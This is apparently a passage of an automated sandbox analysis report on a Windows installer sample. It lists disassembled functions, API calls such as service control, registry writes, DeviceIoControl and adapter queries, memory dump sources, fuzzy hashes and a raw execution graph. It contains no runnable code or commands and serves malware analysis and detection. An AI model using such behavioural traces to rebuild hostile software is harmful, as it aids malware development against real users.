                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC218CB29092009FD310BF68DD446AABBF8FB89304F04C97EE088E3251C3B84555CB6A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004039FE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DestroyWindow.USER32 ref: 00403A17
                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403A48
                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00403A83
                                                                                                                                                                                                                                    • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                                                                                                                                    • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
                                                                                                                                                                                                                                    • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                                                                                                                                    • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                                                                                                                                  • CreateDialogParamA.USER32 ref: 00403AC3
                                                                                                                                                                                                                                  • ShowWindow.USER32 ref: 00403ADC
                                                                                                                                                                                                                                    • Part of subcall function 0040392C: MulDiv.KERNEL32 ref: 00403953
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSendWindow$CountCreateDestroyDialogParamShowTextTickwsprintf
                                                                                                                                                                                                                                  • String ID: o
                                                                                                                                                                                                                                  • API String ID: 2510787843-252678980
                                                                                                                                                                                                                                  • Opcode ID: c8bf9b50f24b706e34797b8f036d4915f5a4dc7d81babb649c8bf478da5301e9
                                                                                                                                                                                                                                  • Instruction ID: 81059e3b479639814b0572c15c12751123e1a1ca33ddd0d88914a755a74492f9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8bf9b50f24b706e34797b8f036d4915f5a4dc7d81babb649c8bf478da5301e9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB21FCB06083059FD710AF65E58875A7FE8FB44309F40843EE4C5A72A1DB798585CF9A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00406557 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                  • String ID: f
                                                                                                                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                  • Opcode ID: f6519dfc4b30f4dc8ba30da0d317b8fe5b2658bb7498cf5162ba835f3d9dec96
                                                                                                                                                                                                                                  • Instruction ID: 922df396bf3e7088f2107368fcd68d656d94b82640ce54d584134d1287f84c7b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6519dfc4b30f4dc8ba30da0d317b8fe5b2658bb7498cf5162ba835f3d9dec96
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E2117B0804308EFDB10AFA9D88829EBFF4EF84314F00C91EE99557281D7B98459CF96
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040395E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: TextTimerWindowwsprintf
                                                                                                                                                                                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                                                                  • API String ID: 2438957755-1158693248
                                                                                                                                                                                                                                  • Opcode ID: bd030a2e39a026ec07ab4720bfc960c357e51ed8894618a1f4644a08019d69f6
                                                                                                                                                                                                                                  • Instruction ID: 5883a2093b31581e9909bbd4cee83827143d54294f5a20fab69da977af55eaa0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd030a2e39a026ec07ab4720bfc960c357e51ed8894618a1f4644a08019d69f6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9015EB0908304AFD710AF24D48525EBFE8EB48355F50C83EE58997281C7B895859B8A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004023C9 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                                                                                                                  • Opcode ID: 96058ded24dfe7affaf00118df6cbde5af697d763978f14ba464de8c35491712
                                                                                                                                                                                                                                  • Instruction ID: 8f4e6c7c9ceedfa20c72349621b66b9a182318fedd968a48d18be14dbb0e03f5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96058ded24dfe7affaf00118df6cbde5af697d763978f14ba464de8c35491712
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC1116B19083009FD750EF69D94839EFBF4FB88315F41886EE58897260D7789985CF46
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004021E3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93windowtimeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                  • String ID: !
                                                                                                                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                  • Opcode ID: ae62e435266e3004bc25908d5d2ad0cb5826a6fc8d1708ba3a371f46b01cab50
                                                                                                                                                                                                                                  • Instruction ID: a790f44bbcbfc51444ab4f93a78f6104840dc0be6af6187218351783eeece817
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae62e435266e3004bc25908d5d2ad0cb5826a6fc8d1708ba3a371f46b01cab50
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 044140B18083109FD715AF6AC84839EFBF4AF84344F41C4AEE488A32A1D7788981CF56
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00406ED7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsWindowVisible.USER32 ref: 00406F16
                                                                                                                                                                                                                                  • CallWindowProcA.USER32 ref: 00406FB8
                                                                                                                                                                                                                                    • Part of subcall function 00404BD7: SendMessageA.USER32 ref: 00404C00
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                  • String ID: $62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa
                                                                                                                                                                                                                                  • API String ID: 3748168415-550765199
                                                                                                                                                                                                                                  • Opcode ID: fef611bbe469a29a19d67650dfd37103651c2d078b1ca09239947b2c1c1f8b3b
                                                                                                                                                                                                                                  • Instruction ID: 9710050d3cc87503a6e3ad62db4a5623da0bea7fc0aec59e94b28eb5e14ff036
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fef611bbe469a29a19d67650dfd37103651c2d078b1ca09239947b2c1c1f8b3b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F212CB0908315AFE710AF15E88496FBBF8EF44718F51883EF895A7281C3795851CB6A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00406FCB Relevance: 6.1, APIs: 4, Instructions: 86windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$TextWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1596935084-0
                                                                                                                                                                                                                                  • Opcode ID: 2d215b4a7c55684c2c01937122f4af6b3fafd761fe9b14146eef76cc387a2035
                                                                                                                                                                                                                                  • Instruction ID: 83727bad7781ca9a6187a820c8695953688329d0e622d1880d2d702268a23253
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d215b4a7c55684c2c01937122f4af6b3fafd761fe9b14146eef76cc387a2035
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF311CB1D08214AFD710AF69C84466FBBF4EF44714F00C42EE884AB380D779A8458B96
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00407D37 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CharNextA.USER32(?,?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407D9F
                                                                                                                                                                                                                                  • CharNextA.USER32(?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407DBE
                                                                                                                                                                                                                                  • CharNextA.USER32(?,?,?,00000000,?,?,?,004042CE), ref: 00407DCA
                                                                                                                                                                                                                                  • CharPrevA.USER32(?,?,00000000,?,?,?,004042CE), ref: 00407DE5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 589700163-0
                                                                                                                                                                                                                                  • Opcode ID: 128b1f827d319e1f67624c76284cc49d88a0dabf465fa48954d28b908fb3de1d
                                                                                                                                                                                                                                  • Instruction ID: 94f009cbb2cc83b7245da44e9dca2fd274f464f9a0f55bd6391dd9b653ffba1a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 128b1f827d319e1f67624c76284cc49d88a0dabf465fa48954d28b908fb3de1d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 492194B1C082406FEB217F28988067ABFE49F85720F49847EE4849B251D3786C45CB6B
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:5.6%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:4%
                                                                                                                                                                                                                                  Total number of Nodes:474
                                                                                                                                                                                                                                  Total number of Limit Nodes:11
                                                                                                                                                                                                                                  execution_graph 3660 4030c2 3661 4030c7 3660->3661 3664 40436c GetModuleHandleA 3661->3664 3663 4030cc 3665 40437b GetProcAddress 3664->3665 3666 40438b 3664->3666 3665->3666 3666->3663 3221 40d451 OpenSCManagerA 3585 404455 3586 404463 3585->3586 3587 40447e 3585->3587 3592 40610d 3586->3592 3595 40613a 3587->3595 3590 40446c 3591 404487 3598 406eb3 3592->3598 3594 406129 3594->3590 3596 406eb3 6 API calls 3595->3596 3597 406156 3596->3597 3597->3591 3600 406eee 3598->3600 3599 405c3b 6 API calls 3599->3600 3600->3599 3602 4071a3 3600->3602 3605 40719b 3600->3605 3601 405c3b 6 API calls 3601->3602 3602->3601 3603 4071ee 3602->3603 3604 405c3b 6 API calls 3603->3604 3603->3605 3604->3603 3605->3594 3700 402355 3701 4023b0 3700->3701 3702 402365 3700->3702 3702->3701 3703 402370 GetLastError SetServiceStatus SetEvent 3702->3703 3703->3701 3704 402157 3705 40215d 3704->3705 3706 402341 GetTickCount 3705->3706 3707 40d489 3706->3707 3725 406bd7 3726 406be6 3725->3726 3727 406beb MultiByteToWideChar 3726->3727 3731 406c51 3726->3731 3728 406c04 LCMapStringW 3727->3728 3727->3731 3729 406c1f 3728->3729 3728->3731 3730 406c25 3729->3730 3733 406c65 3729->3733 3730->3731 3732 406c33 LCMapStringW 3730->3732 3732->3731 3733->3731 3734 406c9d LCMapStringW 3733->3734 3734->3731 3735 406cb5 WideCharToMultiByte 3734->3735 3735->3731 3606 402658 3607 40dbee RegCreateKeyExA 3606->3607 3673 4022e0 VirtualAlloc 3674 40d8ac 3673->3674 3708 402562 3709 40d43e wsprintfA 3708->3709 3213 40d1e3 lstrcmpiW 3608 40d869 CommandLineToArgvW 3609 40da36 GetLocalTime 3608->3609 3610 401f27 27 API calls 3609->3610 3611 40da41 3610->3611 3611->3611 3675 4026e9 3676 40d248 StartServiceCtrlDispatcherA 3675->3676 3214 40226a RegQueryValueExA 3215 40d0ce 3214->3215 3612 40286e CreateThread 3613 40d73d 3612->3613 3614 40d46f CreateFileA 3615 40da4a CloseHandle ExitProcess 3614->3615 3678 40d2f3 WaitForSingleObject ExitProcess 3679 4028f4 RegSetValueExA RegCloseKey 3680 40d63e SetEvent 3679->3680 3681 4026f5 3682 40d295 GetProcAddress 3681->3682 3616 402277 3617 40d2dd Sleep 3616->3617 3618 40d9fd 3617->3618 3618->3618 3619 406a77 3620 406a7e 3619->3620 3621 406a86 MultiByteToWideChar 3620->3621 3622 406aaf 3620->3622 3621->3622 3623 406a9f GetStringTypeW 3621->3623 3623->3622 3540 40da78 3541 40da41 3540->3541 3542 40da37 3540->3542 3542->3541 3544 401f27 3542->3544 3545 401f3c 3544->3545 3548 401a1d 3545->3548 3547 401f45 3547->3541 3549 401a2c 3548->3549 3554 401a4f CreateFileA 3549->3554 3553 401a3e 3553->3547 3555 401a35 3554->3555 3559 401a7d 3554->3559 3562 401b4b LoadLibraryA 3555->3562 3556 401a98 DeviceIoControl 3556->3559 3558 401b3a FindCloseChangeNotification 3558->3555 3559->3556 3559->3558 3560 401b0e GetLastError 3559->3560 3571 402e56 3559->3571 3574 402e48 3559->3574 3560->3558 3560->3559 3563 401c21 3562->3563 3564 401b6e GetProcAddress 3562->3564 3563->3553 3565 401c18 FreeLibrary 3564->3565 3569 401b85 3564->3569 3565->3563 3566 401b95 GetAdaptersInfo 3566->3569 3567 401c15 3567->3565 3568 402e56 7 API calls 3568->3569 3569->3566 3569->3567 3569->3568 3570 402e48 12 API calls 3569->3570 3570->3569 3572 403251 7 API calls 3571->3572 3573 402e5f 3572->3573 3573->3559 3575 403022 12 API calls 3574->3575 3576 402e53 3575->3576 3576->3559 3577 40d578 RegCloseKey 3683 4062f8 3684 403208 7 API calls 3683->3684 3685 4062ff 3684->3685 3578 402a7c 3579 40dc31 CreateDirectoryA 3578->3579 3737 4031fd 3738 403208 3737->3738 3744 40480e 3737->3744 3740 403216 3738->3740 3741 405264 7 API calls 3738->3741 3742 40529d 7 API calls 3740->3742 3741->3740 3743 40321f 3742->3743 3745 40481f 3 API calls 3744->3745 3746 40481b 3745->3746 3746->3738 3211 402981 RegOpenKeyExA 3212 4029be 3211->3212 3686 402281 3687 40d60e wsprintfA 3686->3687 3688 40d7e7 3687->3688 3747 402181 3748 402183 Sleep 3747->3748 3750 402a2b 3748->3750 3751 405184 3752 40518c 3751->3752 3753 40521e 3752->3753 3755 405094 RtlUnwind 3752->3755 3756 4050ac 3755->3756 3756->3752 3689 40d086 3690 40d08e CloseServiceHandle 3689->3690 3692 406c8b 3693 406c99 3692->3693 3694 406c51 3693->3694 3695 406c9d LCMapStringW 3693->3695 3695->3694 3696 406cb5 WideCharToMultiByte 3695->3696 3696->3694 3757 40518c 3758 40521e 